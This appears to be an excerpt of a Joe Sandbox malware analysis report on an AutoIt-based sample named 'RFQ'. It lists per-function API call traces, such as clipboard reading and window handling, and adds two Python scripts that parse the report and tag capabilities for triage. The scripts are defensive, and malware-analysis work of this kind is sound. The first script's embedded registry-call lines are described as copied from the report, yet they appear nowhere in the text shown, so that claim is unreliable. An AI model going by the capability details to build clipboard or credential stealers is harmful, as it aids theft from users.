                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                          • String ID: ($,$tooltips_class32
                                                                          • API String ID: 225202481-3320066284
                                                                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                          APIs
                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                          • CloseClipboard.USER32 ref: 0046DD99
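The call sequence above is a clipboard read: OpenClipboard, IsClipboardFormatAvailable with format 0x0D (CF_UNICODETEXT), GetClipboardData, GlobalLock to reach the text, then a fall-back path that tries format 0x01 (CF_TEXT). It is the function behind the "Contains functionality for read data from the clipboard" signature in the overview. The registry record earlier on the page (RegConnectRegistryW, RegCreateKeyExW, RegCloseKey, with the REG_BINARY … REG_SZ type names as strings) is the matching write-side capability, and RegConnectRegistryW means the key path can point at another machine's registry. The script below is an added example, not part of the report and not Joe Sandbox's own signature logic: it parses API-call lines in the report's textual form, decodes the hex arguments, names the clipboard formats actually fetched, and derives coarse capability tags. The lines in REPORT_SNIPPET are copied from those two records; the tagging rules in CAPABILITY_RULES are the example's own heuristics.

```python
"""Parse Joe Sandbox API-call lines and derive coarse capability tags (added example)."""
import re
from dataclasses import dataclass

# Constructed input: the API-call lines of the clipboard-read record (0046DCE7)
# and the registry-write record (0046BAE6), copied verbatim from the report.
REPORT_SNIPPET = """
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
• RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
"""

# One report line: "• Api.MODULE(arg,arg), ref: ADDR" or "• Api.MODULE ref: ADDR".
CALL_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"   # API name and exporting module
    r"(?:\((?P<args>[^)]*)\))?"                 # argument list, absent on void calls
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$",   # call-site address
    re.MULTILINE,
)

# Standard clipboard format IDs from winuser.h; the report prints them as 8-digit hex.
CLIPBOARD_FORMATS = {1: "CF_TEXT", 2: "CF_BITMAP", 8: "CF_DIB", 13: "CF_UNICODETEXT", 15: "CF_HDROP"}

# Heuristic tags: a tag fires when every listed API appears in the record.
# These rules are the example's own, not Joe Sandbox's signatures.
CAPABILITY_RULES = {
    "clipboard-read": ("OpenClipboard", "GetClipboardData"),
    "registry-create-key": ("RegCreateKeyExW",),
    "remote-registry": ("RegConnectRegistryW",),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # int for hex literals, None for '?' (unresolved), str otherwise
    ref: int     # call-site virtual address


def decode_arg(raw):
    """Turn one report argument into an int, None for '?', or a literal string."""
    raw = raw.strip()
    if raw == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
        return int(raw, 16)
    return raw


def parse_calls(text):
    calls = []
    for m in CALL_RE.finditer(text):
        raw_args = m.group("args")
        args = [decode_arg(a) for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def clipboard_formats_read(calls):
    """Names of the formats actually fetched through GetClipboardData."""
    fmts = set()
    for c in calls:
        if c.api == "GetClipboardData" and c.args and isinstance(c.args[0], int):
            fmts.add(CLIPBOARD_FORMATS.get(c.args[0], "format_%d" % c.args[0]))
    return fmts


def capabilities(calls):
    seen = {c.api for c in calls}
    return {tag for tag, apis in CAPABILITY_RULES.items() if all(a in seen for a in apis)}


if __name__ == "__main__":
    parsed = parse_calls(REPORT_SNIPPET)
    print(len(parsed), "calls; clipboard formats:", sorted(clipboard_formats_read(parsed)))
    print("capabilities:", sorted(capabilities(parsed)))
```

Because these functions belong to the AutoIt runtime rather than to the script, the tags say what the interpreter can do on the script's behalf (ClipGet, RegWrite), not what this particular script does; the dynamic findings in the overview, such as browser and mail credential theft, are what show the capability was actually exercised.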
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                          • String ID:
                                                                          • API String ID: 15083398-0
                                                                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                          • GetClientRect.USER32(?,?), ref: 00471D05
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                          • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                          • String ID: @$AutoIt v3 GUI
                                                                          • API String ID: 867697134-3359773793
                                                                          • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                          • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                          • API String ID: 1503153545-1459072770
                                                                          • Opcode ID: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                          • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                          • Opcode Fuzzy Hash: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                          • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$__wcsnicmp
                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                          • API String ID: 790654849-32604322
                                                                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
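Reading these per-function entries by hand is slow, so here is an added example (not Joe Sandbox code and not part of this report) that parses the API lists and Similarity fields in the form printed above, rebuilds each function's call sequence and tags the behaviour. Its embedded input is copied from three entries of this report: the clipboard reader, the window creation and the window-title matcher. It decodes the clipboard format constants (0x0D is CF_UNICODETEXT, 0x01 is CF_TEXT, so the routine asks for Unicode text first and falls back to ANSI text), and it recognises "AutoIt v3 GUI" as the window class of the AutoIt v3 runtime and the bracketed [CLASS:, [HANDLE:, [REGEXPTITLE: tokens as AutoIt's advanced window-title descriptors, which is why both of those entries come out tagged as runtime code rather than payload logic. The tag names and rules are the script's own, not Joe Sandbox signatures.

```python
"""Parser and tagger for Joe Sandbox function-analysis entries.
Added example, not Joe Sandbox code. Constants are Win32 values
(CF_TEXT = 1, CF_UNICODETEXT = 13); the tag names and rules are this
script's own, not Joe Sandbox signatures."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$")
HEX_ARG_RE = re.compile(r"^[0-9A-F]{8}$")    # the report prints immediates as 8 hex digits
CLIPBOARD_FORMATS = {1: "CF_TEXT", 2: "CF_BITMAP", 8: "CF_DIB", 13: "CF_UNICODETEXT", 15: "CF_HDROP"}
AUTOIT_GUI_CLASS = "AutoIt v3 GUI"           # window class registered by the AutoIt v3 runtime
AUTOIT_DESCRIPTORS = ("[CLASS:", "[HANDLE:", "[REGEXPTITLE:", "[ACTIVE", "[LAST")  # AutoIt title syntax

ApiCall = namedtuple("ApiCall", "name module args ref from_subcall")

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)     # ApiCall records in the order printed
    fields: dict = field(default_factory=dict)   # Similarity fields: API ID, String ID, hashes

def hex_arg(arg):
    """Immediate argument as int; None for '?', string literals and symbolic names."""
    return int(arg, 16) if HEX_ARG_RE.match(arg) else None

def parse_entries(text):
    """Split report text into entries; an 'Instruction Fuzzy Hash' line closes one."""
    entries, cur = [], FunctionEntry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    int(m.group("ref"), 16), bool(m.group("sub"))))
            continue
        f = FIELD_RE.match(line)
        if f:
            cur.fields[f.group("key")] = f.group("val").strip()
            if f.group("key") == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = FunctionEntry()
    if cur.apis or cur.fields:               # keep a truncated last entry
        entries.append(cur)
    return entries

def call_sequence(entry, include_subcalls=False):
    # 'Part of subcall function' lines belong to callees, so they are skipped by default
    return [c.name for c in entry.apis if include_subcalls or not c.from_subcall]

def clipboard_formats_requested(entry):
    """Decode the CF_* constants passed to the clipboard query/fetch calls."""
    names = set()
    for c in entry.apis:
        if c.name in ("IsClipboardFormatAvailable", "GetClipboardData") and c.args:
            v = hex_arg(c.args[0])
            if v is not None:
                names.add(CLIPBOARD_FORMATS.get(v, f"CF_{v}"))
    return sorted(names)

def classify(entry):
    names, tags = set(call_sequence(entry)), set()
    if {"OpenClipboard", "GetClipboardData"} <= names:
        tags.add("clipboard-read")          # fetches, not merely probes, clipboard contents
    if any(c.name == "CreateWindowExW" and AUTOIT_GUI_CLASS in c.args for c in entry.apis):
        tags.add("autoit-runtime")          # creates the runtime's own GUI window class
    if any(tok in entry.fields.get("String ID", "") for tok in AUTOIT_DESCRIPTORS):
        tags.add("autoit-runtime")          # parses AutoIt advanced window descriptors
    return tags

# Constructed input: three entries copied from this report (clipboard reader,
# GUI window creation, window-title matcher), trimmed to the lines used here.
SAMPLE = """\
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
• Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(sorted(classify(e)), call_sequence(e), clipboard_formats_requested(e))
```

Run it directly to print the tags, call sequence and decoded clipboard formats for the embedded sample; to triage a whole report, paste further entries into the input and add rules for the call sequences behind the injection-related signatures listed at the top of this page. Subcall lines are excluded from the sequence by default because they describe the callee, not the function whose hashes the entry records.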
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                          • Opcode Fuzzy Hash: 37a5c787a7b2188dc8d5479775b41731b0c96863aaa01ab20318fba061c3c2a8
                                                                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                          APIs
                                                                            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                          • _fseek.LIBCMT ref: 00452B3B
                                                                          • __wsplitpath.LIBCMT ref: 00452B9B
                                                                          • _wcscpy.LIBCMT ref: 00452BB0
                                                                          • _wcscat.LIBCMT ref: 00452BC5
                                                                          • __wsplitpath.LIBCMT ref: 00452BEF
                                                                          • _wcscat.LIBCMT ref: 00452C07
                                                                          • _wcscat.LIBCMT ref: 00452C1C
                                                                          • __fread_nolock.LIBCMT ref: 00452C53
                                                                          • __fread_nolock.LIBCMT ref: 00452C64
                                                                          • __fread_nolock.LIBCMT ref: 00452C83
                                                                          • __fread_nolock.LIBCMT ref: 00452C94
                                                                          • __fread_nolock.LIBCMT ref: 00452CB5
                                                                          • __fread_nolock.LIBCMT ref: 00452CC6
                                                                          • __fread_nolock.LIBCMT ref: 00452CD7
                                                                          • __fread_nolock.LIBCMT ref: 00452CE8
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                          • __fread_nolock.LIBCMT ref: 00452D78
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                          • String ID:
                                                                          • API String ID: 2054058615-0
                                                                          • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                          • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: 0
                                                                          • API String ID: 2353593579-4108050209
                                                                          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                          APIs
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                          • String ID:
                                                                          • API String ID: 1744303182-0
                                                                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                          • __mtterm.LIBCMT ref: 00417C34
                                                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
